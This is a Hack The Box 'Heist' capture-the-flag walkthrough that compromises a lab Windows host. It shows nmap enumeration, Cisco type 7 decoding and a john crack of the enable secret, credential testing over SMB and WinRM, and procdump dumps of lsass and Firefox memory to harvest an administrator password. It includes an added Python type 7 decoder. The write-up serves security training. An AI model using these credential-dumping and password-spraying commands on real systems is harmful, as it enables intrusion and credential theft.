Hack The Box: Heist Walkthrough
Author: fkclai is a Certified Ethical Hacker, Penetration Tester, Auditor and a Tech Enthusiast with more than 5 years of experience in the field of Application Security.
@27 Oct 2019
The game could not have been completed without the support of my friend David Au and the other members of CTF Playgroup Hong Kong & Macau.
Target machine: 10.10.10.149
Attacking (Hacker) machine: 10.10.15.203
The target machine IP is 10.10.10.149. Get a basic understanding of the services available on the target machine using aggressive nmap scanning of all ports.
0.1) Quick Initial Scan
nmap 10.10.10.149 -oN nmap-quick-heist.txt
nmap -p- 10.10.10.149
0.2) Detailed Analysis
nmap -sV -p 80,135,445 -A -oN nmap-htb-heist.txt 10.10.10.149
80/tcp open http Microsoft IIS httpd 10.0
|_ httponly flag not set
|_ Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Nikto -- no vulnerability that could be abused to bypass authentication.
dirb http://10.10.10.149/attachments/ /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
Go to http://10.10.10.149. You will see "Login as guest".
After logging in as guest, you will see that the Support Admin has opened an account for user Hazard.
On the forum, there is also a Cisco config file attached.
The config file contains three password hashes
Cisco type 7 passwords can be decoded with this tool: http://www.ifm.net.nz/cookbooks/passwordcracker.html
For the Cisco enable secret (type 5, an MD5-crypt hash), we can crack it using john with the rockyou wordlist in Kali:
john --wordlist=rockyou.txt hash.txt
root@Kali:~/Desktop/Wordlist# john --show hash.txt
1 password hash cracked, 0 left
The decrypted passwords are as follows:
password 7 0242114B0E143F015F5D1E161713=> $uperP@ssword
password 7 02375012182C1A1D751618034F36415408=> Q4)sJu\Y8qz*A3?d
Enable secret $1$pdQG$o8nrSzsGXeaduXrjlvKc91=> stealth1agent
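As an added example (not part of the original walkthrough), the following Python audit script shows why the config file gave up its passwords so easily: type 7 strings are a fixed-key XOR obfuscation that decodes directly, while the type 5 enable secret is an MD5-crypt hash that has to be cracked offline as shown above. The config excerpt and the usernames in it are constructed; the hash values are the ones from the file.

```python
import re

# Cisco "type 7" is a fixed-key XOR obfuscation, not encryption. The key below is
# the well-known IOS constant; the first two digits of a type 7 string are a
# decimal offset into it.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 string ('NN' + hex pairs) to its plaintext."""
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError("not a type 7 string")
    offset = int(encoded[:2], 10)
    out = []
    for i, pos in enumerate(range(2, len(encoded), 2)):
        byte = int(encoded[pos:pos + 2], 16)
        out.append(chr(byte ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]))
    return "".join(out)


# Matches 'password 7 <hex>' and 'secret 5 <md5crypt>' in IOS config lines.
TYPE7_RE = re.compile(r"\bpassword 7 ([0-9A-Fa-f]+)")
TYPE5_RE = re.compile(r"\bsecret 5 (\$1\$\S+)")


def audit_config(config_text: str) -> list:
    """Return (line, finding, detail) for every weak credential storage found.

    Type 7 lines are decoded on the spot to demonstrate reversibility; type 5
    lines are only reported, since recovering them needs an offline crack."""
    findings = []
    for line in config_text.splitlines():
        m = TYPE7_RE.search(line)
        if m:
            findings.append((line.strip(), "type7-reversible", decode_type7(m.group(1))))
            continue
        m = TYPE5_RE.search(line)
        if m:
            findings.append((line.strip(), "type5-md5crypt-offline-crackable", m.group(1)))
    return findings


# Constructed excerpt; usernames are placeholders, hash values are from the walkthrough.
SAMPLE_CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username user1 password 7 0242114B0E143F015F5D1E161713
username user2 privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for line, finding, detail in audit_config(SAMPLE_CONFIG):
        print(f"{finding:36} {detail!r:24} <- {line}")
```

The fix on the device side is to replace type 7 entries with type 8 or 9 secrets (`username ... secret 9 ...`, `enable algorithm-type scrypt secret ...`), which are salted hashes rather than obfuscation.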
Not much valuable information is retrieved by this scan.
We look for SMB vulnerabilities, but find none that can be exploited.
Use different tools to connect to the Windows server and try different account/credential pairs. No exploitable share can be abused, but we confirm that the password for user account Hazard is stealth1agent:
(a) smbclient -L 10.10.10.149 -U Hazard%stealth1agent
(b) smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
(c) rpcclient -U 'Hazard%stealth1agent' 10.10.10.149
We can use rpcclient to open an authenticated SMB session to the target machine.
Then, we perform enum4linux with a valid Windows user account.
enum4linux -v -a -S -U -d -u Hazard -p stealth1agent 10.10.10.149
Grep the enum4linux result for the keyword "Local". We discover many local accounts on the target Windows server.
Using smbclient to try different account and credential pairs, we confirm that another valid account-credential pair is Chase:Q4)sJu\Y8qz*A3?d. We have also checked that there are no exploitable shares for user Chase.
crackmapexec smb 10.10.10.149 -u Hazard -p 'stealth1agent'
No shell is gained through crackmapexec.
In the service scan, server port 5985/tcp is open. After some research, we find it is the WinRM (Windows Remote Management) service.
On the Desktop, we find user.txt (the user flag) and a todo.txt (not much of value).
Confirm that there is only one admin account (in the administrators group).
Start a SimpleHTTP server on Kali
python -m SimpleHTTPServer 80
We download procdump.exe from Kali to the target machine. Even though an exception is raised, the executable is uploaded successfully.
However, dumping the lsass.exe process is rejected:
cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma lsass.exe -accepteula "C:\Users\Chase\Desktop\lsass.dmp"
Inspect the other running processes on the target.
There are many processes. After several trials, we discover a user password in the firefox process. That is reasonable, since the web browser is the process most likely to hold a user password in memory.
Detailed steps are as follows:
PS > cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma 5400 -accepteula "dmp"
Remark: 5400 is the PID of firefox at that time.
Then, we use PowerShell to extract the password:
Get-ChildItem -Path "C:\Users\Chase\Desktop\1928firefox.dmp" -Recurse -File | Select-String login
At the end of Part 3, we have obtained a new password.
Probably it is the Administrator's password. Let's try it!
Modify winrm_shell.rb with the administrator account and the new password.
We successfully gain the root shell and own the machine!